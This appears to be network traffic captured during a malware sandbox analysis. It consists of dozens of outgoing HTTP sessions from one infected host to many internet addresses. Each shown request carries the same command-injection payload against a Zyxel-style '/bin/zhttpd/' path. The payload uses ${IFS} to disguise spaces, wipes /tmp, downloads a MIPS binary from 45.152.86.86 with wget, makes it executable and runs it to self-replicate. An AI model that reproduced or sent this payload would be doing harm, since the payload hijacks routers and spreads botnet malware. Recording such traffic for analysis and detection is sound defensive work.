                                        Mar 31, 2024 09:22:15.539808989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7554192.168.2.2357050142.248.174.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:15.540050030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7555192.168.2.2346080116.203.49.8443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:16.549477100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7556192.168.2.2344248211.22.236.135443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:16.549532890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7557192.168.2.233829670.72.8.246443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:16.549568892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7558192.168.2.2334880129.219.121.196443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:16.549607992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7559192.168.2.234310019.82.154.246443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:16.549802065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7560192.168.2.234299674.155.113.233443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:16.549846888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7561192.168.2.235107847.79.217.187443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:16.549880028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7562192.168.2.233439473.115.235.103443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:17.553102016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7563192.168.2.234631424.13.221.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:17.553133011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7564192.168.2.2341878167.12.142.22443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:17.553162098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7565192.168.2.2353314152.24.150.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:17.553201914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7566192.168.2.234905674.100.35.250443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:17.553255081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7567192.168.2.2346774186.36.203.5443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:17.553288937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7568192.168.2.2343598195.119.200.191443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:17.553328037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7569192.168.2.2337448179.230.226.254443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:17.553525925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7570192.168.2.233989238.23.47.228443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:18.560322046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7571192.168.2.235552268.46.29.89443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:18.560379982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7572192.168.2.235444044.27.121.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:18.560419083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7573192.168.2.235126080.41.247.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:18.560492992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7574192.168.2.2359312105.227.64.111443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:18.560657024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7575192.168.2.234713675.143.212.78443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.583357096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7576192.168.2.234208093.248.1.34443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.583405018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7577192.168.2.2345080149.161.80.62443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.583477974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7578192.168.2.2343352187.206.116.116443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.583576918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7579192.168.2.23548788.43.200.255443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.583623886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7580192.168.2.2335878106.63.190.164443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.583703995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7581192.168.2.235747018.162.48.37443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.583760023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7582192.168.2.2339086131.160.98.111443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.583821058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7583192.168.2.235490879.43.197.166443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.583885908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7584192.168.2.2346438167.49.107.114443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.583941936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7585192.168.2.234191094.22.104.101443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.584022045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7586192.168.2.235583619.84.227.118443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.584079027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7587192.168.2.234253287.4.126.98443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.584156990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7588192.168.2.2332832213.81.112.33443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.584260941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7589192.168.2.2349472192.160.241.70443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.584310055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7590192.168.2.2341752162.144.252.163443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.584377050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7591192.168.2.235746837.16.172.11443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.584441900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7592192.168.2.234969241.243.34.204443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.584498882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7593192.168.2.234533645.27.72.249443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.584563017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7594192.168.2.2349106174.253.1.246443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.584635973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7595192.168.2.235992845.47.157.18443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.584711075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7596192.168.2.2353804143.153.176.46443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.584764957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7597192.168.2.2335532159.77.26.238443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.584835052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7598192.168.2.235304032.139.143.237443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.584887028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7599192.168.2.235152280.108.152.235443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.584973097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7600192.168.2.2340496140.186.252.245443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.585041046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7601192.168.2.235590266.111.18.159443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.585129976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7602192.168.2.2341246164.7.119.52443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.585180998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7603192.168.2.233425265.225.31.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.585227966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7604192.168.2.2333566134.87.81.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.585293055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7605192.168.2.234923479.84.140.160443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.585361004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7606192.168.2.233963648.176.150.70443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.585419893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7607192.168.2.233926440.74.218.78443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.585500956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7608192.168.2.2343118141.209.180.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.585565090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7609192.168.2.2335890139.158.101.126443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.585630894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7610192.168.2.235509031.10.68.172443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.585715055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7611192.168.2.2337992205.5.152.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.585760117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7612192.168.2.235528679.191.107.226443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.585834980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7613192.168.2.2340630175.149.32.94443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.585891962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7614192.168.2.235502693.180.85.123443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.585961103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7615192.168.2.233897614.23.167.92443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.586044073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7616192.168.2.2354878118.70.92.182443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.586108923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7617192.168.2.2358884101.162.242.63443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.586193085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7618192.168.2.233321861.195.133.198443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.586241007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7619192.168.2.2345694158.108.3.228443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.586303949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7620192.168.2.2357860153.180.61.59443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.586364985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7621192.168.2.233489619.162.242.221443
                                        TimestampBytes transferredDirectionData
